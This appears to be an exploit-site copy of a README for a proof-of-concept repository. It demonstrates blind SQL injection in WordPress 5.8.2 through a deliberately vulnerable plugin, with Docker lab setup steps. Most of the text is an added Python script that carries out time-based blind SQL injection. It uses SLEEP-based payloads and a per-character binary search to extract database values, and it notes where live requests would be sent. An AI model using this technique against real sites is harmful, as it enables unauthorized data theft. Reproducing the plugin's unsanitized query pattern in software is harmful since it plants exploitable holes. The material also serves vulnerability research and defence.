## https://sploitus.com/exploit?id=A40C8D1C-7680-5929-84E7-B7A946A7ACF3
This repository demonstrates a vulnerability in WordPress 5.8.2,
in which missing sanitization in class-wp-tax-query.php can, in very specific situations,
allow attackers to perform SQL injection. Note that successful exploitation
requires developers to add vulnerable code to the WordPress instance, in which unsanitized
user input is passed into the $terms variable that is then used to construct a SQL clause.
See evil.php in the included "evil" plugin, and the lack of sanitization of the $terms variable
in get_sql_for_clause in class-wp-tax-query.php. WordPress core alone is not exploitable without such plugin or theme code.

The vulnerable/malicious plugin is located at src/wp-content/plugins/evil/evil.php.

Demonstration steps
sudo docker-compose up
follow the installation instructions at http://localhost
activate the WordPress plugin in the admin panel (it's titled evil plugin)
Send the request in newexploit_req.txt to the newly created server. You should get a time delay.
Note that the vulnerability demonstrated by the plugin is a blind SQL injection: nothing from the query is echoed in the response, so if you want to try data retrieval you'll need to retrieve data via time delays or errors.
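To show what "data retrieval via time delays" means in practice, here is an added example (not code from this repository) of a time-based blind SQL injection oracle: it asks one boolean question per request ("is the ASCII value of character N greater than X?"), treats a slow response as "true", and binary-searches each character. The payload shape (`IF(cond, SLEEP(n), 0)`), the placeholder `col`/`tbl` names, the `SECRET` value and `simulated_target` are all assumptions or constructed stand-ins so the script runs offline; the repository's actual request lives in newexploit_req.txt and is not reproduced here.

```python
"""Time-based blind SQL injection extraction (added example, not the repository's code).

Assumptions, not taken from the page: the target delays its response by about
DELAY seconds when the injected condition is true (MySQL IF(cond, SLEEP(n), 0))
and answers at normal speed when it is false. SECRET and simulated_target are
constructed stand-ins for the database value and the vulnerable endpoint.
"""
import random
from typing import Callable

DELAY = 2.0        # seconds the payload asks the database to sleep (assumption)
BASELINE = 0.05    # typical latency of a non-delayed response (constructed)

SECRET = "wp_admin42"   # constructed value standing in for a database value


def payload(pos: int, threshold: int, delay: float = DELAY) -> str:
    """General MySQL time-based probe for 'ASCII of character <pos> > threshold'.

    `col` and `tbl` are placeholders for illustration only; they are not the
    column or table used by the repository's request.
    """
    return (f"IF(ASCII(SUBSTRING((SELECT col FROM tbl LIMIT 1),{pos},1))>{threshold},"
            f"SLEEP({delay}),0)")


def simulated_target(pos: int, threshold: int) -> float:
    """Constructed stand-in for the vulnerable endpoint.

    Returns the response time a real probe would take instead of sending a
    request: about DELAY + BASELINE when the condition holds, about BASELINE
    otherwise, plus a little jitter so the classification threshold is exercised.
    Against a live target this is where you would send payload(pos, threshold)
    and measure time.perf_counter() around the request.
    """
    jitter = random.uniform(0.0, 0.1)
    cond = pos <= len(SECRET) and ord(SECRET[pos - 1]) > threshold
    return (DELAY if cond else 0.0) + BASELINE + jitter


def is_delayed(elapsed: float, baseline: float = BASELINE, delay: float = DELAY) -> bool:
    """Classify a timing as 'condition true' if it exceeds baseline by half the sleep.

    Using half the requested sleep as the margin tolerates ordinary latency
    jitter without mistaking a merely slow response for a true condition.
    """
    return elapsed >= baseline + delay / 2


def extract_char(oracle: Callable[[int, int], float], pos: int,
                 lo: int = 31, hi: int = 126) -> str:
    """Binary-search one printable character (ASCII 32..126) through the oracle.

    Invariant: the character's code is in (lo, hi]. Each probe asks
    'code > mid', halving the interval, so at most 7 probes resolve one byte.
    """
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_delayed(oracle(pos, mid)):
            lo = mid
        else:
            hi = mid
    return chr(hi)


def extract(oracle: Callable[[int, int], float], length: int) -> str:
    """Recover `length` characters, one binary search per position."""
    return "".join(extract_char(oracle, pos) for pos in range(1, length + 1))


def max_probes(length: int) -> int:
    """Upper bound on requests needed: 7 per character for a 95-symbol alphabet."""
    return 7 * length


if __name__ == "__main__":
    calls = 0

    def counting_oracle(pos: int, threshold: int) -> float:
        global calls
        calls += 1
        return simulated_target(pos, threshold)

    recovered = extract(counting_oracle, len(SECRET))
    print(f"recovered {recovered!r} in {calls} probes (bound {max_probes(len(SECRET))})")
```

Before extracting data this way you normally learn the value's length with the same trick on `LENGTH(...)`, and on a real network you calibrate `BASELINE` from a handful of non-delayed requests rather than hard-coding it; a misjudged threshold turns into silently wrong characters, so re-check any byte whose probe timings landed near the margin.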

Debugging notes
Run sudo service docker restart if a name resolution failure occurs.
Adjust xdebug.client_host=172.19.0.1 in xdebug.ini as needed to match the Docker bridge address on your host.